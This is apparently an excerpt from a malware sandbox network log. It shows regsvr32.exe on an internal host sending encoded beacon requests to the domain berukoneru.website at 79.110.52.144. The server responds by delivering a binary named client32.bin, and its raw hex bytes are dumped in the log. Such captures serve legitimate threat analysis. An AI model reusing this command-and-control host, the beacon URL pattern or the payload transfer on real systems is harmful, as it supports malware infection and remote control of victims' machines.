                          Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          7 | 192.168.2.5 | 49803 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
                          Timestamp | kBytes transferred | Direction | Data
                          2021-12-14 09:34:07 UTC | 1101 | OUT | GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:08 UTC | 1166 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:08 GMT
                          Content-Type: application/zip
                          Content-Length: 268426
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=g1gq8askkhd329edj5m5lndu22; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:08 UTC1166INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                          Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                          2021-12-14 09:34:08 UTC1182INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                          Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                          2021-12-14 09:34:08 UTC1294INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                          Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                          2021-12-14 09:34:08 UTC1342INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                          Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                          2021-12-14 09:34:08 UTC1358INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                          Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                          2021-12-14 09:34:08 UTC1550INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                          Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                          2021-12-14 09:34:08 UTC1582INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                          Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                           2021-12-14 09:34:08 UTC | 1646 | IN | Data Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                          Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                           2021-12-14 09:34:08 UTC | 1662 | IN | Data Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                          Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                           2021-12-14 09:34:08 UTC | 1700 | IN | Data Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                          Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                           2021-12-14 09:34:08 UTC | 1716 | IN | Data Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                          Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                           2021-12-14 09:34:08 UTC | 1732 | IN | Data Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                          Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                           2021-12-14 09:34:08 UTC | 1819 | IN | Data Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                          Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                           2021-12-14 09:34:08 UTC | 1835 | IN | Data Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                          Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                           2021-12-14 09:34:08 UTC | 1851 | IN | Data Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                          Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                           2021-12-14 09:34:08 UTC | 1867 | IN | Data Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                          Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                           2021-12-14 09:34:08 UTC | 1883 | IN | Data Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                          Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                           Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49805 | Destination IP: 79.110.52.144 | Destination Port: 443 | Process: C:\Windows\SysWOW64\regsvr32.exe
                           Timestamp | kBytes transferred | Direction | Data
                           2021-12-14 09:34:08 UTC | 1890 | OUT | GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                           2021-12-14 09:34:08 UTC | 1891 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:08 GMT
                          Content-Type: application/zip
                          Content-Length: 1869
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=t7tkicntofbn6h47i9uut29i93; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
